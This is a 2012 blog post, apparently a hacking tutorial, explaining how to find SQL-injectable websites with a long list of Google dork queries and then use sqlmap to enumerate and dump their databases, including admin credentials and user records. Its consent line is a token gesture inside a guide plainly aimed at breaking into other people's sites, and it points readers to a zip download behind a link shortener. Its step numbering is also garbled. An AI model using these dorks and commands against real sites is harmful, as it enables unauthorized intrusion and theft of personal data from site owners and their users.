Saturday, January 21, 2012

How to Hack a Website Using SQL Injection

How to Hack a Website, Method #1
-------------------------------------------
Using SQLMap to Hack Vulnerable Databases

Hackers sometimes hack into databases to get information such as Admin passwords, secret files, internal memos, leaked emails, and user information. To find sites to hack by typing these "dorks" into Google:

allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:productinfo.php?id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:trainers.php?id=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:newsone.php?id=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:aboutbook.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:pages.php?id=
allinurl:clanek.php4?id=
allinurl:announce.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:viewapp.php?id=
allinurl:viewphoto.php?id=
allinurl:rub.php?idr=
allinurl:galeri_info.php?l=
allinurl:review.php?id=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=
allinurl:newsone.php?id=
allinurl:aboutbook.php?id=

Click on one of the links that shows up, and then look that the URL, you should see something like, 

id=5. 

Add a ' to the end of that, so it should look like
id=5'

Then hit enter and if the page returns some sort of error, the page is vulnerable. Now, lets hack it!

How to hack it:

1) Download the .zip from http://adf.ly/4v7L6
2) Extract it to your desktop
3) Open your terminal, cmd, or equivilant
4) Run, "cd Desktop"
5) Run, "cd sqlmap"
6) Obtain written consent from the owner. Don't do anything illegal.
7) Copy the link that we ran earlier and remove the ' mark
8) To get their databases, run:
 "./sqlmap -u [PASTE the link we copied on step 7] --dbs"
9) Now you have a list of their databases. Don't mess around with "information_schema", it doesn't have anything we need/want
10) A list appears with all of the databases. Choose the database. If you want to end up hacking this site, you should choose a database that sounds like it may contain admin info. If you're just exploring their database, select what sounds the most interesting. Now that we have a database picked out, lets find all the tables in it. Use this:
"./sqlmap -u [DATABASE YOU'RE EXPLORING] --tables"
6) A list of the tables in that database should appear. Now, like before, find the table that sounds the most interesting and run this command:
"./sqlmap -u [TABLES YOU'RE EXPLORING] --columns"
7) Now, having seen the tables, you can dump the contents of that table by running:
"./sqlmap -u [TABLES YOU WANT TO DUMP] -U test --dump"
Depending on the size of the database, you could have the contents instantly to a few hours. Most things take less than a minute, but if you're dumping the info of thousands to millions of users, it could take all night. I normally just leave my computer running and set my alarm to wake me up really early. 
I hope you enjoyed this tutorial, I run this site as my only source of income, and we are completely ad supported. Thanks for anything you can do to help from looking at an ad if you're interested, to donating! 
Hack the Planet,
The Author 




Posted by at 6:31 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)